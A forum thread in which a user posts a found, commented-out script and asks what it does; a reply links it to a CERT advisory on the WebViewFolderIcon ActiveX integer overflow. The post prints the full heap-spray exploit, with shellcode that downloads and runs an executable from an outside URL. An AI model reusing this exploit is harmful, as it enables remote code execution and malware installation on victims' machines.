What is this script doing?

V

V S Rawat

Could someone please give me some idea what this script is doing.

It might be some malicious script that might have been used to spread
virus or to hack username/ password, hence it has been ### so that it
can't be run by default.

thanks.

<!-- <html>
###<body>
###<script>
### var heapSprayToAddress = 0x05050505;
### var shellcode = unescape("%u9090"+"%u9090"+
###"%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320" +
###"%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2" +
###"%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b" +
###"%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b" +
###"%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a" +
###"%u2e55%u7865%u0065%uc033%u0364%u3040%u0c78%u408b" +
###"%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40" +
###"%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83" +
###"%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8" +
###"%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52" +
###"%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff" +
###"%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff40" +
###"%uffff%uff52%ue8d0%uffd7%uffff%u7468%u7074%u2f3a" +
###"%u6d2f%u686f%u6973%u776e%u6265%u6973%u6574%u632e" +
###"%u2e6f%u6b75%u622f%u6e69%u3264%u652e%u6578%u0000");
###var heapBlockSize = 0x400000;
###var payLoadSize = shellcode.length * 2;
###var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
###var spraySlide = unescape("%u0505%u0505");
###spraySlide = getSpraySlide(spraySlide,spraySlideSize);
###heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
###memory = new Array();
###
###for (i=0;i<heapBlocks;i++)
###{
### memory = spraySlide + shellcode;
###}
###for ( i = 0 ; i < 128 ; i++)
###{
### try
### {
### var tar = new
ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
### tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
### }
### catch(e){}
###}
###
###function getSpraySlide(spraySlide, spraySlideSize)
###{
### while (spraySlide.length*2<spraySlideSize)
### {
### spraySlide += spraySlide;
### }
### spraySlide = spraySlide.substring(0,spraySlideSize/2);
### return spraySlide;
###}
###
###</script>
###</body>
###</html>
### -->
--
 
D

denisb

V S Rawat said:
Could someone please give me some idea what this script is doing.
[snip]

### var tar = new
ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
### tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
Click to expand...

"The Microsoft Windows WebViewFolderIcon ActiveX control contains an
integer overflow vulnerability. This may allow a remote, unauthenticated
attacker to execute arbitrary code on a vulnerable system."

in <http://www.kb.cert.org/vuls/id/753044>
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Similar Threads

What do you think about this script? 0
Help me sort out this script 1
Issue with textbox script? 0
How do I fix this issue in sqaurespace code block? 1
JavaScript: how to keep track of the circle in canvas on specific path? 0
Can someone tell me if this a real tracker? Or is it one designed to show you a different message at certain times, ie. acting like one? 0
Filename undefined for Blob ? 1
Large, Filled Arrays: What is Happening? 9

Members online

No members online now.
Total: 60 (members: 2, guests: 58)
Robots: 349

Forum statistics

Threads
473,994
Messages
2,570,222
Members
46,809
Latest member
moe77

Latest Threads

Top